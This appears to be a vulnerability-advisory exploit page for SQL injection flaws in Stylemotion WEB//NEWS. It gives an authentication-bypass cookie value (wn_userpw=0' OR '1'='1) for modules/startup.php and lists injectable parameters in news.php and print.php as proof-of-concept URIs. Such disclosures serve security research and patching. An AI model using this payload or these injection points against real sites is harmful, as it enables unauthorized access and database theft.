Stylemotion WEB//NEWS Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

Stylemotion WEB//NEWS Multiple SQL Injection Vulnerabilities

No exploit is required.

The following is sufficient to supply to 'modules/startup.php' to authenticate:
wn_userid=1; wn_userpw=0' OR '1'='1

The following proof of concept URI are available:
http://www.example.com/include_this/news.php?cat=[SQL]
http://www.example.com/include_this/news.php?id=[SQL]
http://www.example.com/print.php?id=[SQL]
http://www.example.com/include_this/news.php?stof=[SQL]